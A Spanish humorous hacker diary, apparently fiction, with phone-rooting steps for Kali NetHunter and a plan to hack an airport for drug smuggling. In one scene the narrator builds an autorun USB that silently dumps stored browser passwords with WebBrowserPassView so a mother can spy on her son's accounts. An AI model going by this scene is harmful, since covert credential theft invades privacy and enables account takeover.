- Bien - llamó con a mano al mesero - ¿qué prefieres, un lambrusco?
- Nah, estamos en Francia... no en Italia; ¿tiene algo de Provenza?
- Oui monsieur, mais le coût... - Mom interrumpió
- Dijo Provenza, no preguntó cuanto cuesta... y nos trae otra canasta de macaroones. 
- Oui monsieur

Terminando regresé al hotel… que lujoso, pensé.

- Hola terrorista cibernético
- Hola Chun-lee
- Haha, ¿por? - le envié la foto que le tomé el día que comimos
- Te pasas ... ¿ya comiste quesos añejados y vinos?
- Vino.. y macaroones; ¿te gustó el concierto?
- Si, mucho... ¿ya tienes un nuevo empleo que no sea turbio ni ilegal?
- Aun no me ofertan, hasta mañana
- ¿Aceptaras?

 

Querido Diario…

“Quiero verte una vez más”…

Domingo, 13 de Mayo de 2018: #traición #decepción #deshonor

Querido Diario…

Después de llegar al aeropuerto, Mom se perdió entre la multitud para atender sus negocios; mientras yo fui a casa a descansar un poco; y pensar. Sólo me encontré con una solución, y como siempre, actué sin pensar mucho.

Lalo parecía que me estaba esperando, así que lo hice complice de mi pésima idea.

Sentado allí, frente a ella, a su merced; sentía que no había sido la mejor decisión que había tomado, pero ya lo había hecho.

Ella enmarcaba sus rasgos finos con un cabello un tanto despeinado a propósito; vestía un entallado vestido negro no tan corto pero no tan largo, que le hacía ver muy elegante. Lo suficiente para sentirme más intimidado por como se veía, que por sus guardaespaldas bien armados. Mi manía de ver las manos, ella la había pasado; tenía manos delicadas y cuidadas; con un color de uñas sobrio, sin exageraciones. Su perfume era demasiado empalagoso para mi gusto. Sus movimientos eran tan llenos de seguridad que se veían seductores. Tenía mucho tiempo que no había sido intimidado de esa forma; y al  mismo tiempo me daba cierta confianza.

Al entrar su guardaespaldas no me habían desarmado. De todas formas poco habría podido haber hecho frente a esos tipos de dos metros con brazos más grandes que el grosor de mi pierna; portando sus M16.

Desde que habíamos llegado hablamos poco y fuimos al punto; nos sirvieron la comida. Aguachile de habanero, era delicioso; pero no lo estaba disfrutando, me sentía tan intimidado por ella que empecé a cuidar en exceso mis modales, haciéndome muy torpe.

Mientras yo luchaba por clavar un camarón con el trincho, ella rompió mi introversión.

- ¿Entonces?, ¿qué piensas?
- No dijiste que no; sólo dijiste que no pasaría muy rápido
- ¡Que terco eres! - hizo una pausa - eso me gusta de ti
- ¿En serio? - me sorprendió ese comentario - ¿puedes ir a decírselo a mi mamá?, ella opina lo contrario
- ¿Te gusta el mezcal? - me preguntó mientras se sentaba en la silla de mi derecha, y con sus dedos tomó el camarón que tanto se me había escapado y me lo dio en la boca
- No realmente
- Tal vez no has probado uno bueno - y con una mano ordenó que nos fuesen a servir un par de caballitos

Un mesero llegó y nos entrego un par de caballitos y rodajas de naranja con sal de gusano. Eso me asustó más, lo peor que podría pasar es terminar borracho con ella.

Levanto su mano y me hizo una señal de salud para bebernos todo el mezcal de un tiro.

- ¿Y?
- Sigue sin ser mi preferido

Esas palabras notablemente la desilusionaron.

Se acercó a mi, demasiado. Me desabrochó la camisa y desanudo mi corbata. En ese momento no pude distinguir si estaba seduciéndome o me iba a cortar la garganta; pero no me moví en lo más mínimo. Metió su mano y sacó el anillo, lo miró y luego volvió a meterlo entre mis ropas y de un tirón me ajustó la corbata.

- Que bonito gesto

Se levantó y fue ella misma a la barra por la botella. Se sirvió otro caballito de mezcal y empezó a caminar alrededor de la mesa.

- He escuchado un poco de ti, y cuando me dijiste que vendrías ordené que te investigasen. No las cosas que ya todos saben... una investigación un poco más personal
- ¿Y qué tal?
- ¿Cuanto te paga Mom?, yo lo duplicaré
- No estoy aquí por eso, ya sabes lo que quiero
- Y ya te dije que no lo tendrás ni fácil ni pronto; o tal vez ni lo tengas. ¿Por qué estas con él?
- Tenemos un acuerdo 
- ¡Hombres!, y su honor... me aburren. Las mujeres somos mejores en los negocios; no seguimos códigos sin sentido. - hizo una pausa y se acercó dema... suficiente, y me dijo al oido - Dame dos semanas.

Dos horas después bajé y me despedí de la hostess, y caminé tranquilamente hacia donde estaba el coche. Al verme llegar Lalo salió.

- Joven, ¿estas vivo?, ¿cigarro?
- Si, esta vez te lo acepto
- ¿Cómo te fue?
- Bien, creo.. en dos semanas nos ayudarán
- Hum... - empezó a dudar - es mucho tiempo joven. ¿Qué haremos mientras?
- Usar nuestros propios recursos, aun tenemos la carta con Nemux

Mientras estábamos los dos recargados en el coche fumando, le pude ver acercarse a la ventana y hacer un gesto con la mano. Lalo me interrumpió el divage

- Joven, tienes manchado el cuello de la camisa con lápiz labial
- Ouuuu - intenté limpiarme mientras al girar vi la mirada inquisitora de Lalo - ¿qué?
- ¡No!
- No podemos solos
- Joven, eso está muy mal... eso es traición, deshonor... que decepción joven; jamás lo creí de ti. No, no, no... acabas de perder toda credibilidad que tenía en ti; y eso que ni tenías credibilidad.
- A veces hay que hacer lo que hay que hacer
- ¿Y qué tanto hubo que hacer?
- Nada no tan malo
- Oh demonios, joven... 
- ¿Qué?
- ¿Brasileña o afro?, ¿tanga o cachetero?, ¿encaje o algodón?
- Eres un puerco... - dije, mientras tiré el cabo del cigarro y le hice seña para que nos fuésemos - hay que apurarnos, tenemos que todavía de ver cuales son los avances del Becario y el Becario con esteroides.
- Esos detalles son necesarios para armar el perfil psicológico. No sabemos con quién nos estamos asociando
- Ajá
- Si, lo vi en CSI
- Ajá
- Es una loca, adinerada que tortura a la gente. Es más, tu deberías estar muerto... o tal vez te va a matar proximamente; o puede que no y tal vez te quiera secuestrar. 
- Hum... eso puede que si, pero no por lo que estas imaginando - para despejar las dudas de Lalo, puse una canción en la radio

Manejamos todo Insurgentes para llegar a la oficina. Todo el camino Lalo se pasó dándome un sermón sobre el honor, la dignidad, el orgullo y todas esas cosas que usualmente omito. Llegamos a la oficina y entregamos el coche al valet, subimos y encontramos todo a media luz. Cruzamos la puerta de acero blindada y entonces vimos al Becario y el Becario con esteroides trabajando arduamente.

Al acercarme me di cuenta que en realidad estaban viendo Netflix.

- ¿Qué tenemos muchacho?
 - No mucho joven - me respondió Lalo 2 - intentamos contactar a una empresa que se llama IntacticPhone, nos hicieron la presentación y todo, se ven pro.

- ¿Entonces necesitamos comprar eso? - pregunté
 - Ese es el problema joven, $6000 dólares cada equipo; y necesitamos diez
 - Ouuu.. eso si es un problema. Becario con esteroides; ¿cual es la opción B?
 - ¿Qué tranza boss?, veo esos triceps adelganzando y de nuevo noto la panza
 - Ouuu... he estado un poco..
 - Enamorado - interrumpió Lalo
 - Ocupado
 - Haciendo cosas que no debe con quién no debe - volvió a interrumpir Lalo
 - En pos del bien común
 - Creo que ustedes se traen algo raro - dijo Lalo 2, mientras se nos quedaba mirando muy raro
 - Sigamos... Becario con Esteroides, ¿algo que tenga que ver con la tarea?
 - Ah, pues si... creo que nuestra mejor opción es preparar nuestros propios teléfonos; que sean de bajo costo, porque los vamos a abandonar; y realizar el aseguramiento sobre la red de telefonía normal. No creo que sea la mejor idea, pero tampoco la peor.
- ¿Qué necesitamos hacer para eso?
- Bueno, estuve probando con un celular viejito que tenía, un OnePlus; lo que hice fue descargar de Kali Linux el fork de Nethunter. Es una versión de Kali pero para ARM, la encontré en https://www.kali.org/kali-linux-nethunter/ ... sólo recuerda respaldar todo, porque perdí mis packs. 
- Ouuuu... - pelé los ojos - ¡respaldos muchacho!, ¿qué más?
- Bueno pues primero hay que entrar en el modo ingeniero; para eso hay que apachurrarle el [Inicio] y [Bajar volumen] y planchas la imagen de fabrica. Al mismo tiempo descargas las SDK tools para Windows
- ¿Windows? - dije 
- Si, Android, no creo que en tú Mac funcioné
- Hum... sigue
- Bueno, pues ya que configuramos todo vamos a flashear el celular
- Este procedimiento es complejo joven - dijo Lalo 2 - yo lo aprendí en mi curso de Análisis Forense
- ¿En la UNAM? - pregunté
- No, en la Plaza de la Computación, con el greñas. Esta bien chido
- Ouuuu ok - a veces me sorprende nuestro nivel de especialización - sigue
- Pues conectas el celular, esperas a que lo detecté y te vas al folder donde descargaste el firmware. Y entonces correr el script de flash-all.bat

- Ya que quedó, lo reinicias y entonces inicias el celular como si fuese nuevo. Lo configuras y todo el asunto; y activas el modo desarrollador, desde Configuración > Acerca del dispositivo y allí donde aparece el número de compilación le picas ocho veces hasta que salga el mensaje de que eres programador
- ¿Es en serio?
- ¿Qué?
- ¿Así activas el modo de desarrollo?
- Si
- Con razón Android es tan malo, bueno... sigue
- Ya que eres desarrollador, vas a Opciones del programador > Depuración por USB -> Aceptar y ahora reinicias el celular. Cuando vaya a aprender de nuevo entras al modo ingeniero. Ya que reinicio te vas a la computadora y escribes:
> fastboot devices
> fastboot oem unlock
> flashrecovery imagen.img
- Luego vuelves al celular y entonces seleccionas Recovery Mode, seleccionas Super Su, te vas a Advance y seleccionas ADB Sidebar; y esperas. En este momento esta esperando; vas a la computadora y pones:
> adb sideload supersu....zip
- Y esperas... y esperas y esperas...

 

- Ya que terminé vas a ver que esta instalado el Super su. Ahora mueves e Nethunter directo con el .zip y lo pegas en la tarjeta. Ya cuando está en el celular reinicias en Recovery Mode y le das click en instalar. Te va a pedir las aplicaciones que quieres instalar; y aceptas.

- Luego reinicias y listo, te pide permisos y todo eso.

- Hum.... - me quedé pensando - ¿qué opina joven?
- Ahhhh pues... chance y pega - opinó Lalo
- ¿Cuanto cuesta?
- Un OnePlus medio magullado en Mercado Libre; unos $2000 o $3000
- ¿Dólares?
- Pesos
- Ok, hay que comprar los diez. ¡Becario!, tarjeta - le dije a Lalo 2
- No joven, ya pasamos por esto una vez y no me pagaste
- ¡Becario!
- ¡Joven!
- Esto es por el bien común
- Pero no es por el bien de mis finanzas
- ¡Becario!, no tienes la actitud - y a regañadientes sacó su tarjeta de crédito
- Becario con Esteroides, prepara todos los equipos una vez que lleguen
- Si boss

Este era un buen comienzo, empezaban a construirse los vectores de ataque y teníamos al fin una aliada que tenía experiencia en algo así de grande. Tal vez si podríamos cumplir la tarea.

De vuelta a casa recibí una llamada telefónica. Antes siempre temía cuando Mom me marcaba, pero creo que ahora mis temores cambiarían de orden.

- Hola
- Ven - dijo en forma más de orden que de invitación
- Pero ya me voy a mi casa
- Dije "ven" - y subió un poco el tono de la orden
- Ok, dice Waze que llegó en 30min
- Bien... suficiente para que las burbujas se formen - y colgó

Querido diario… me siento usado; tal vez Lalo tenga razón, pero no tenía opción.

Hoy vi esto y no pude evitar querer una:

Así que de vuelta pasé a comprar algo de aragonita y piedra viva para iniciar un acuario marino y tener unas almejas máximas. Al menos son mejores mascotas que Shellcode.

Domingo, 11 de Marzo de 2018: ¡Muchacho me tapaste el zinc!

Querido Diario…

El día de ayer había sido un día altamente productivo en el que iba a dedicar toda la tarde a leer un documento; cuando alguien me distrajo de mis responsables actividades.

Obviamente me resistí.. como una hora. Y después de eso terminé tooooooda la tarde, noche, madrugada y siguiente mañana viendo Love.

Ok, no hice nada… y en la mañana estaba tranquilamente descansando cuando escuché que se azotó la puerta. Domingo, la puerta azotandose y el sonido de cumbias y salsas invadiendo la salsa. Eso sólo se podía significar una cosa. La señora Belén había ido a hacer la limpieza.

La señora Belén es mi sirvienta, inicialmente era de mi rentero pero terminó siendo mía. Y bueno, yo no ensucio mucho pero mis manos no fueron echas para agarrar escobas o lavar trastes, ¡yiuck!.

Me paré a cerrar la puerta y evitar que de pronto entrase a jalarme las cobijas. Ella tiene llave de mi casa y sabe que si la puerta de mi habitación está cerrada es porque estoy en cueros, y es mejor que haga toda la limpieza de lo demás primero y deje al final la habitación; pero en esta ocasión no le importó y me sacó a rastras de la habitación.

- ¡Muchachooooooooooo! '¡ra no'más lo que hiciste

Sabía que estaba abajo en la cocina, pero su voz se escuchaba hasta arriba como si la tuviese a un lado.

- Allí déjelo, al rato lo lavo - grité
- ¡Qué al rato ni que al rato!, párate ahorita mismo y vas a ver la tarugada que hiciste - Si, allí la tenía al lado de mi pegándome a donde cayese
- ¿Ahora que yo hice?, sea lo que sea tiene una explicación - intentaba detener los golpes mientras bajábamos las escaleras
- ¿Qué explicación?, si tapaste todo el zinc

¡Ohhh! paréntesis; para los amantes del español. Zinc en cachanillo significa lavabo.

- A ver, ¿qué explicación tiene eso?
- Ohhhh si la tiene, de hecho es muy buena. Miré el otro día estaba yo haciendo chocolates, pero no lograba hacer la mezcla correcta; entonces tuve que tirar varías mezclas y las tiré al lavabo... y de pronto ya no se empezó a ir, y fue cuando me di cuenta que verter chocolate líquido caliente a una tubería fría había sido mala idea y... pues, henos aquí, con el "zinc" tapado.

Pensé que con esa explicación era suficiente para que ella entendiese que todo había sido un accidente. Pero no… con la señora Belén, nunca se puede dialogar.

- ¿Qué estas tarado?
- Oiga... no sé como es la vida en Mexicali, en serio aquí es otro país, pero... usualmente de donde vengo, las sirvientas no le gritan al patrón

Vi la furia en sus ojos, me hice bolita, y lo hice muy rápido; y sólo alcancé a sentir el escobazo en la espalda… y luego otro, y luego otro más, y luego uno más; hasta que me resbalé; y empecé a rezar por mi vida.

- Ante ti poderoso señor de la verdad y la luz me presento; nada poseo salvo mi propio ser y mi humana naturaleza. Señor guerrero por excelencia, tus armas truncaron los sables de Dios... 
- ¿Qué estas diciendo? - la señora Belén es peor que mi mamá, creo que sólo se podría comparar con la señora Esthela
- Pues estoy rezando
- ¿Qué clase de padre nuestro es ese?
- Ya le había dicho que no soy cristiano - y esa respuesta se tradujo en otro escobazo
- Ya párele, ¿no?... ahorita lo arreglamos
- ¿Y cómo piensas arreglarlo?
- Pues... pues... quito el tubo, le pongo otro tubo; y ya... así de facíl
- ¿Y tú sabes de poner tubos?
- Hum... no, pero... ñeeee.. ¿qué puede salir mal?

Querido Diario… como decía un maestro de Química que me dio clase en UPIBI… “¿fontanero yo?, si para eso estudié?”.  Unas horas después estábamos inundados en la cocina; teníamos a un verdadero fontanero arreglando el lavabo y la señora Belén estaba tan enojada que no tenía ganas ya de pegarme.

- Oiga.. 
- ¿Qué? - me miró de una forma que sabía que cada palabra que dijese podía representar mi eventual muerte; o peor, que renuncie
- Ya hace hambre, ¿no?
- Pues si, pero yo no voy a poder ir a comer; ahorita mis hijos ya deben andar en el sobre ruedas; y yo aquí esperando a poder secar la cocina
- Yooo... yoooo.. pues usted ya se dio cuenta que esto de la fontanería no es lo mío, perooo... yo creo que va a tardar - y me miró con unos ojos aun más amenazantes - hum.. oiga.. ¿le gusta el rámen?
- Si
- Pues yo propongo que vayamos a comer, mientras el señor termina y nos relajamos un poco.. usted deja la escoba; y firmamos las pases
- Bueno

Fuimos a un sitio llamado Umai, hace poco comí allí y me gustó mucho; hacen un rámen muy bueno… que extrañamente me recordó el mole de olla de mi abuelita.

- ¿Y ahora por que estas aquí?
- ¿Cómo?
- Si, tienes rato que no te vas
- Ouuuu.... tube unas discrepancias laborales y hum... digamos que la competencia me quiere desaparecer. Así que el dueño de donde trabajo prefiere que este aquí antes de que me pase algo malo
- Hum... ¿qué estudiaste?
- ¿En la escuela?
- Si
- Ahhh no estudié aquí; también estudié en el DF, estudie Ingeniería en Sistemas Computacionales son especialidad en Sistemas
- Hum... nunca te había preguntado a que te dedicabas, pero si.. pareces como algo de computadoras
- ¿Cómo es eso?
- Pues sólo te faltan lentes para verte como ño... 
- Señora, termina esa palabra y juro que le sorrajo el plato en la cabeza
- ¿Puedes hackear un Facebook?
- Pfff.. ¿por qué la gente siempre busca eso?... no lo parece pero estudié una ingeniería en una de las mejores escuelas del mundo; ¿y quiere que hackee un Facebook?
- Huuuuy pues perdón, era un favor - y me empecé a reir

El “Huuuuuy pues perdón” es una frase que yo digo mucho, y que ahora se le ha vuelto costumbre decir.

La señora Belén tenía un problema; uno de sus hijos cree que anda hum.. consumido cosas que no debe; y está un poco asustada porque hace poco le encontró algo más “fuerte”. Así que quiere entrar a su Facebook para saber que esta haciendo su hijo.

- ¿Qué no ha escuchado de la privacidad?
- ¡Ay chamaco!, ¿a poco tu mamá no haría algo así?
- Hum... sinceramente... creo que no. A la primer sospecha me habría roto algún hueso
- Bueno, pero seguro tu no hiciste nada de eso; y ella no tenía que preocuparse
- No, pues no
- Nunca te drogaste
- Bueno... comparado con el croc, la cocaína; no... es casi un dulce
- Ni bebiste en la escuela
- Bueno... no, ósea en la vocacional asaltábamos las camiones de Corona, pero no... no me gusta la cerveza
- ¿Ves?, en cambio este pen... ashh.. es que ya no se que hacer
- Hum... - quería ayudarla, pero ¿y mis principios?, ¿y mi ética?
- Anda
- Eso está un poco mal, tal vez debería de hablar con su hijo... al viejo estilo; creo que a usted se le da
- ¿Cómo?
- Hum.. *ALGUIEN* alguna vez me dijo que en Mexicali si acostumbraba la educación a base de la chancla
- Ay no sé, anda en malos pasos... imagínate que tu hubieses mentido, robado, engañado, hecho cosas malas; ¿dónde habrías acabado ahorita?
- Ouuuuu.. en la H. Organización Turbia e Ilegal.. ¿cree que le interese ser becario?, tenemos gente en Mexicali; podría trabajar conmigo
- Déja de bromear muchacho

Si, al final terminó convenciendome. Así que acepté.

- Miré, le voy a preparar algo... usted sabrá si lo usa o no. Pero, a mi no me meta, ni me diga nada. Sólo le advierto, a veces conocer las cosas de todos puede ser no tan bueno
- Ok, ok... ¿que hay que hacer?
- Vamos al Office Depot

Pasamos a comprar una memoria USB, el limpia pisos que le gusta y una cosa, que no recuerdo cual es la palabra; pero es la palabra cachanilla para destapa caños. Era un liquido pero, ella le dijo de otra forma.

- Oye muchacho
- ¿Eu?
- Una vez vi una película que se llama El intruso, ¿lo que vas a hacer no es igual?
- Hum.. si y no, no y si.... miré, si hay gente mala; muy mala que hace cosas como en esa película. Pero yo no... yo... es difícil explicarle
- ¿Puedes hackear un carro?
- Hum... pues nunca lo he intentado; teóricamente si, pero en práctica no estoy seguro
- ¿Cómo aprendiste todo esto?, ¿en la escuela? yo estaba pensando en mandar a mi hijo a CETYS
- Hum... no aprenderá eso allí. No lo sé... es complejo; y créame no quiere su hijo aprenda esto. Le voy a explicar paso a pasito, para que me entienda lo que estoy haciendo, vea que no es nada del otro mundo, pero... entienda lo que implica. ¿Hecho?
- Hecho - e hice como que me escupía la mano y se la daba.

Pensé en el método menos feo para enseñarle; tampoco quería meterle en un problema. Así que pensé en hacerle un USB password stealer; usando Web Browser Pass View. No es nada del otro mundo, sólo una herramienta que saca el dump de las contraseñas almacenadas en el navegador. Perfecto para que la señora pueda obtener las credenciales de Facebook, Twitter, Instragram, Snapchat, Plurk… no que quiera, sin hacer algo “malo”.

Descargue la herramienta y la coloqué en la memoria USB, luego cree un bat para ejecutarla:

Después de creado el bat, hice también un autorun, para que la herramienta se ejecute con sólo meter la USB en una computadora y en ese momento sacar todos los passwords:

Y le enseñé a la señora como funcionaba:

¡Oh diablos!, esos son mis passwords de algunas cosas y les había visto la señora Belén.

En fin, después de que terminó la inundación; la señora me puso a ayudarle a secar toda la cocina; tendió mi cama y me agradeció la comida. Se llevó una USB que únicamente con conectarla podrá espiar a su hijo de en medio… si, creo que eso no es correcto pero… ella me cae bien.

- Gracias muchacho
- Hum... yo creo que... no debería. Dele un sape como las madres de antes
- Al que le voy a dar el sape es a ti si vuelves a tapar el zinc
- Nooooo, por favor - e hice como que me hacía bolita - oiga
- ¿Qué?
- ¿Cómo se va a ir?
- Pues voy a tener que pedir un Uber, porque ya no está mi hijo mayor para que venga por mi
- ¿Dónde vive?, yo la llevo
- Pues si, porque son como $100 hasta allá, esta bien caro muchacho. ¿Conoces Villa Florida?
- Hum... olvídelo, buena suerte
- Ven para acá
- Ohhhh ya voy subase
- Si tiene mala fama el fraccionamiento, pero no está feo, es sólo mala fama
- No era por eso, soy chilango... nada por aquí puede ser lo suficientemente peligroso para mi
- ¿Entonces?
- Oiga... necesito un favor a cambio
- ¿Qué?
- Usted me dijo que luego iba mucho a San Pedro porque se dedica a los banquetes, ¿no?
- Si
- Voy a comprar una casa, quiero una grande, con alberca de preferencia y aire acondicionado del que va por dentro... consígame una ¿no?
- Ay muchacho... cuando te conocí estabas bien flaco de que no tenías dinero, incluso me quedaste a deber; y ¿ahora hasta casa?, ¿en que andas metido?, no vaya a ser que tenga que usar la cosa está en ti para saber que te traes
- Huuuuy no señora; capaz que se me espanta
- Bueno, yo te aviso. Gracias por el "raite"
- Hum... cuídese, el domingo no voy a estar. Salgo de viaje y regreso pero hasta la tarde; cierra bien; y le lava su tapetito a Shellcode.

Querido Diario… ser adolescente en la era de la tecnología debe ser difícil. Pobre de su hijo, si así me pega a mi… creo que le a romper algo importante. Pero… como decía mi abuela; así se educa a la gente.

Martes, 24 de Octubre de 2017: Siempre hay que decir que si

Querido diario..

Hace muchos años, en los tiempos en que existía el RTM Security Team, hice una sección; que si no mal recuerdo se llamaba “vPasswordList”, era un formulario donde invitaba a la gente a meter su password, se almacenaba en un TXT y ese TXT era descargable. Antes de que te quejes, en ese entonces no existían los leaks masivos que hay ahora, de hecho lo más “leak” creo que había sido el que generó rockyou.txt

Obvio muchos se quejaron porque decían que iba a hacer una relación de varias cosas para determinar de quién había sido el password, así que no sirvió de mucho mi idea de hacer un diccionario. Y ayer me acordé por esto:

Bueno… dejando de lado las comicidades del día. Un día, cuando yo aun era un consultor respetable, gran profesionista con mucho futuro, me mandaron a revisar la seguridad de una aplicación; pero cuando llegué no era una aplicación propiamente dicho… bueno si, porque ¿quién sabe que es una aplicación y que no es?, a lo que me refiero es que yo para ese entonces lo único que había revisado eran portales y bancas en línea; de pronto llegué y lo que vi fue el software que había desarrollado una empresa para controlar los tokens de autenticación y la administración (de forma muy básica) de varios tipos de biométricos.

Apenas vi la situación y dije #estacab%&/(esepe&/( e inmediatamente, como hace todo buen consultor, llame a mi gerente.

Pero mi gerente… ¡ah! si tuviese que definir la palabra jefe, diría que es él. Es el mejor jefe que he tenido, le vamos a llamar “El ingeniero”. El ingeniero era alguien de esas personas que ya ha pasado por mucho, tiene mucha experiencia, todo el tiempo se la pasaba leyendo; y era un experto en bases de datos, principalmente Oracle. Y algo que me enseño El ingeniero es a siempre decir que si, un verdadero consultor jamás duda.

Así que bueno, cuando vi mi aplicación que no era aplicación corrí como consultor senior asustado a decirle:

- Bueno
- ¡Ingeniero!, tenemos un problema
- ¿Qué pasó ingeniero?, ¿cómo esta?, ¿ya desayunó?, tomese un cafecito hombre, no hay problemas

Otra de las grandes virtudes de El ingeniero es su capacidad para conservar la calma, creo que eso también le aprendí. ¿Has visto el meme ese del perrito que esta en llamas y dice “I’m fine”, bueno, al Ingeniero lo llegué a ver en medio de unas vías sin poder arrancar el coche y decir “Oiga… jajaja… esta cosa no arranca ingeniero, nos van a aplastar hombre”.

Ya todo alterado le empecé a explicar que no entendía nada de como hacer la revisión de la aplicación, que tenía todo el día sin siquiera poder identificar una interfaz, que la aplicación no hacia nada y que estaba en un rincón llorando… pero el Ingeniero me dijo, una frase que siempre recuerdo cuando esty en crisis:

- Ingeniero, pues si todas las aplicaciones son lo mismo: autenticación, autorización, manejo de sesiones... ¿qué no maneja sesiones? pues no revise sesiones, que no tiene interfaz, pues no haga validación de entradas.. nada más lo que hay ingeniero
- Pero es que ese es el problema, no hace nada, ¡nada más autentica!
- Pues si nada más autentica, pues revise pura autenticación ingeniero

Para el Ingeniero la vida siempre era fácil y nosotros nos complicábamos todo, así que supongo que mucho de mi estilo actual de “gestión de proyectos” se lo aprendí a él. (Cabe señalar que pasé dos meses haciendo reversing a los drivers y firmware de los biométricos, lo cual.. creo que no venía en OWASP, ni era parte de la autenticación, pero psss.. el Ingeniero).

Por cierto… no tiene mucho que lo vi, hace como un mes viaje al Distrito Federal y aproveché para verlo a él y a otros amigos de mi vida normal. Pero bueno, sigamos…

El punto es que gracias a él aprendí que los consultores de seguridad son machos, que jamás dicen que no ¡ahhhh! y otra de las frases épicas del Ingeniero:

- Ingeniero, soluciones no preguntas ingeniero, soluciones.

Aprendí a que mi único objetivo en la vida es resolver situaciones complejas, con el menor esfuerzo posible y siempre cumpliendo con los objetivos. Deminios, querido diario… creo que fui entregado para ser un bug bounty hunter, desde antes de que lo fuese D:

El punto es… y a todo lo que va esto es… en dos semanas salgo para Colombia, a una de las mejores misiones de mi vida… pasara 12 kilogramos de cocaína haciendo no sé para evadir todos los controles de seguridad. ¿Cómo se hace eso?, pues bueno…. no tengo la menor idea.

Además de llevar a las Gemelas (mis dos pistolas de oro), aquí se necesita ser inteligente, no podemos andar dando balazos por todos lados. No sé a que me voy a enfrentar, sólo una vez he hackeado un aeropuerto y tiene mucho tiempo y fue para entrar al sistema corporativo del grupo empresarial al que le pertenecía, acá es diferente, hay que hacer cosas que no entiendo como hacerlas y no se que puedo esperar. La otra es que yo encuentro fallos en aplicaciones, la infraestructura no es lo mío, tiene mucho tiempo que no hago un pentest y estoy algo oxidado, así que llevaré algunas herramientas de uso general.

Primero que nada hay que contemplar de que me voy a enfrentar a quién sabe qué, así que lo primero será hacer un reconocimiento. Para ello se puede hacer primero un reconocimiento externo en el que tendré que hacer uso de búsquedas en fuentes abiertas, para eso a mi me gusta mucho Maltego; después de eso habrá que realizar una exploración lo cual yo para eso principalmente uso IP Network Browser, Nmap y Sonar; después de eso primero hay que buscar errores de configuraciones, errores de explotación inmediata y un análisis de vulnerabilidades sobre objetivos especificos que nos parezcan interesantes; yo para eso uso Nessus, DameWare, Burp Suite, Metasploit.. y finalmente atacar, que para eso Metasploit va también bien.

Ahora, todo esto hay que guardarlo en cierta parte.. no está demás llevar todo cifrado en un contenedor de VeraCrypt en un disco duro, con la máquina base completamente limpia y todo en máquinas virtuales. Yo sigo prefiriendo MS Windows para trabajar, pero obvio siempre hay que llevar Kali, por cualquier cosa.

Para la virtualización yo uso VMWare Fusion; pero el Workstation funcionará bien para los que su máquina base sea MS Windows o Linux; yo uso Apple para todo.

En cuanto a servicios, yo recomiendo instalar LAMP o XAMP, porque a veces es necesario pasar algún archivo dentro de la red para hacer movimientos laterales, también es posible usar para eso Netcat; pero hay que llevar de todo.

La primera vez que ataqué un aeropuerto fue por wireless, de hecho fue por error; así que olvidar llevar una antena; yo recomendaría mucho una Wifi Pineapple, ¡diablos!, las mías las tienen Janey y Beto… bueno, espero que no haya que atacar nada wireless.

Creo que con estas cosas básicas y muy generales estaré listo para trabajar en El Dorado.